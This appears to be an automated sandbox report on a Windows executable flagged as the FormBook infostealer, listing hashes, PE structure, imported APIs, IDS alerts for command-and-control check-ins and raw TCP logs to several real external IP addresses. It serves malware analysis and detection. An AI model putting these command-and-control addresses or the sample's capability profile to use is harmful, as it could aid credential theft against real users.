                                                                            SSDEEP:24576:Htb20pkaCqT5TBWgNQ7aG4lBiRI7ia0eDD6A:EVg5tQ7aGY3T5
                                                                            TLSH:5445CF1373DDC361C3B25273BA26B701AE7B782506A5F96B2FD4093DE820162525EB73
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                            File Icon

                                                                            Icon Hash:aaf3e3e3938382a0

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x425f74
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x673F1325 [Thu Nov 21 11:01:57 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:1
                                                                            File Version Major:5
                                                                            File Version Minor:1
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:1
                                                                            Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            call 00007F2B4587B10Fh
                                                                            jmp 00007F2B4586E124h
                                                                            int3
                                                                            int3
                                                                            push edi
                                                                            push esi
                                                                            mov esi, dword ptr [esp+10h]
                                                                            mov ecx, dword ptr [esp+14h]
                                                                            mov edi, dword ptr [esp+0Ch]
                                                                            mov eax, ecx
                                                                            mov edx, ecx
                                                                            add eax, esi
                                                                            cmp edi, esi
                                                                            jbe 00007F2B4586E2AAh
                                                                            cmp edi, eax
                                                                            jc 00007F2B4586E60Eh
                                                                            bt dword ptr [004C0158h], 01h
                                                                            jnc 00007F2B4586E2A9h
                                                                            rep movsb
                                                                            jmp 00007F2B4586E5BCh
                                                                            cmp ecx, 00000080h
                                                                            jc 00007F2B4586E474h
                                                                            mov eax, edi
                                                                            xor eax, esi
                                                                            test eax, 0000000Fh
                                                                            jne 00007F2B4586E2B0h
                                                                            bt dword ptr [004BA370h], 01h
                                                                            jc 00007F2B4586E780h
                                                                            bt dword ptr [004C0158h], 00000000h
                                                                            jnc 00007F2B4586E44Dh
                                                                            test edi, 00000003h
                                                                            jne 00007F2B4586E45Eh
                                                                            test esi, 00000003h
                                                                            jne 00007F2B4586E43Dh
                                                                            bt edi, 02h
                                                                            jnc 00007F2B4586E2AFh
                                                                            mov eax, dword ptr [esi]
                                                                            sub ecx, 04h
                                                                            lea esi, dword ptr [esi+04h]
                                                                            mov dword ptr [edi], eax
                                                                            lea edi, dword ptr [edi+04h]
                                                                            bt edi, 03h
                                                                            jnc 00007F2B4586E2B3h
                                                                            movq xmm1, qword ptr [esi]
                                                                            sub ecx, 08h
                                                                            lea esi, dword ptr [esi+08h]
                                                                            movq qword ptr [edi], xmm1
                                                                            lea edi, dword ptr [edi+08h]
                                                                            test esi, 00000007h
                                                                            je 00007F2B4586E305h
                                                                            bt esi, 03h
                                                                            jnc 00007F2B4586E358h
                                                                            movdqa xmm1, dqword ptr [esi+00h]

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [IMP] VS2008 SP1 build 30729
                                                                            • [ASM] VS2012 UPD4 build 61030
                                                                            • [RES] VS2012 UPD4 build 61030
                                                                            • [LNK] VS2012 UPD4 build 61030

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x597f4.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x11e0000x6c4c.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0xc40000x597f40x59800a9611adfd37702c33cd4a14019583af1False0.9272515494064246data7.8906408115013935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x11e0000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                            RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                            RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                            RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                            RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                            RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                            RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                            RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                            RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                            RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                            RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                            RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                            RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                            RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                            RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                            RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                            RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                            RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                            RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                            RT_RCDATA0xcc7b80x50af9data1.000335865944101
                                                                            RT_GROUP_ICON0x11d2b40x76dataEnglishGreat Britain0.6610169491525424
                                                                            RT_GROUP_ICON0x11d32c0x14dataEnglishGreat Britain1.25
                                                                            RT_GROUP_ICON0x11d3400x14dataEnglishGreat Britain1.15
                                                                            RT_GROUP_ICON0x11d3540x14dataEnglishGreat Britain1.25
                                                                            RT_VERSION0x11d3680xdcdataEnglishGreat Britain0.6181818181818182
                                                                            RT_MANIFEST0x11d4440x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                            Imports

                                                                            DLLImport
                                                                            WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                            COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                            USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                            UxTheme.dllIsThemeActive
                                                                            KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                            USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                            GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                            ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                            OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishGreat Britain

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-11-22T07:49:29.052437+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449736154.215.72.11080TCP
                                                                            2024-11-22T07:50:03.299040+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449752116.50.37.24480TCP
                                                                            2024-11-22T07:51:26.987114+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44980585.159.66.9380TCP
                                                                            2024-11-22T07:51:42.053332+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44997491.195.240.9480TCP
                                                                            2024-11-22T07:52:05.483779+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45001966.29.149.4680TCP
                                                                            2024-11-22T07:52:20.826825+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450023195.110.124.13380TCP
                                                                            2024-11-22T07:52:52.599727+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450027217.196.55.20280TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 22, 2024 07:49:27.337749004 CET4973680192.168.2.4154.215.72.110
                                                                            Nov 22, 2024 07:49:27.457302094 CET8049736154.215.72.110192.168.2.4
                                                                            Nov 22, 2024 07:49:27.457598925 CET4973680192.168.2.4154.215.72.110
                                                                            Nov 22, 2024 07:49:27.460985899 CET4973680192.168.2.4154.215.72.110
                                                                            Nov 22, 2024 07:49:27.580604076 CET8049736154.215.72.110192.168.2.4
                                                                            Nov 22, 2024 07:49:29.052217007 CET8049736154.215.72.110192.168.2.4
                                                                            Nov 22, 2024 07:49:29.052366972 CET8049736154.215.72.110192.168.2.4
                                                                            Nov 22, 2024 07:49:29.052437067 CET4973680192.168.2.4154.215.72.110
                                                                            Nov 22, 2024 07:49:29.056566954 CET4973680192.168.2.4154.215.72.110
                                                                            Nov 22, 2024 07:49:29.296034098 CET8049736154.215.72.110192.168.2.4
                                                                            Nov 22, 2024 07:49:53.373621941 CET4973780192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:53.493149042 CET8049737116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:53.493268013 CET4973780192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:53.495199919 CET4973780192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:53.614689112 CET8049737116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:55.004821062 CET4973780192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:55.060182095 CET8049737116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:55.060213089 CET8049737116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:55.060297012 CET4973780192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:55.060331106 CET4973780192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:55.124357939 CET8049737116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:55.124452114 CET4973780192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:56.023524046 CET4973980192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:56.143049955 CET8049739116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:56.143259048 CET4973980192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:56.145203114 CET4973980192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:56.265391111 CET8049739116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:57.661030054 CET4973980192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:57.761873960 CET8049739116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:57.761914015 CET8049739116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:57.761955023 CET4973980192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:57.761985064 CET4973980192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:57.780508995 CET8049739116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:57.780592918 CET4973980192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:58.681035995 CET4974180192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:58.800484896 CET8049741116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:58.800601959 CET4974180192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:58.802984953 CET4974180192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:49:58.922586918 CET8049741116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:58.922594070 CET8049741116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:58.922597885 CET8049741116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:58.922646999 CET8049741116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:58.922718048 CET8049741116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:58.922724009 CET8049741116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:58.922841072 CET8049741116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:58.922844887 CET8049741116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:49:58.922952890 CET8049741116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:50:00.317151070 CET4974180192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:50:00.373270988 CET8049741116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:50:00.373326063 CET8049741116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:50:00.373342991 CET4974180192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:50:00.373372078 CET4974180192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:50:00.436634064 CET8049741116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:50:00.436691999 CET4974180192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:50:01.336025953 CET4975280192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:50:01.689901114 CET8049752116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:50:01.690012932 CET4975280192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:50:01.692224026 CET4975280192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:50:01.811739922 CET8049752116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:50:03.298827887 CET8049752116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:50:03.298979044 CET8049752116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:50:03.299040079 CET4975280192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:50:03.303077936 CET4975280192.168.2.4116.50.37.244
                                                                            Nov 22, 2024 07:50:03.422687054 CET8049752116.50.37.244192.168.2.4
                                                                            Nov 22, 2024 07:50:17.512871027 CET4978880192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:17.632612944 CET804978885.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:17.632705927 CET4978880192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:17.642718077 CET4978880192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:17.762378931 CET804978885.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:19.145313025 CET4978880192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:19.265084028 CET804978885.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:19.265149117 CET4978880192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:20.238718987 CET4979480192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:20.358331919 CET804979485.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:20.358439922 CET4979480192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:20.360714912 CET4979480192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:20.480381012 CET804979485.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:21.864037037 CET4979480192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:21.984149933 CET804979485.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:21.984222889 CET4979480192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:22.883277893 CET4980080192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:23.004030943 CET804980085.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:23.004192114 CET4980080192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:23.007030010 CET4980080192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:23.126773119 CET804980085.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:23.126785040 CET804980085.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:23.126852036 CET804980085.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:23.126857042 CET804980085.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:23.126924038 CET804980085.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:23.126957893 CET804980085.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:23.127034903 CET804980085.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:23.127098083 CET804980085.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:23.127105951 CET804980085.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:24.520636082 CET4980080192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:24.640769958 CET804980085.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:24.640851021 CET4980080192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:25.539989948 CET4980580192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:25.659499884 CET804980585.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:50:25.659682035 CET4980580192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:25.662738085 CET4980580192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:50:25.782248020 CET804980585.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:51:26.986809969 CET804980585.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:51:26.987061977 CET804980585.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:51:26.987113953 CET4980580192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:51:26.990776062 CET4980580192.168.2.485.159.66.93
                                                                            Nov 22, 2024 07:51:27.110167027 CET804980585.159.66.93192.168.2.4
                                                                            Nov 22, 2024 07:51:32.389179945 CET4995680192.168.2.491.195.240.94
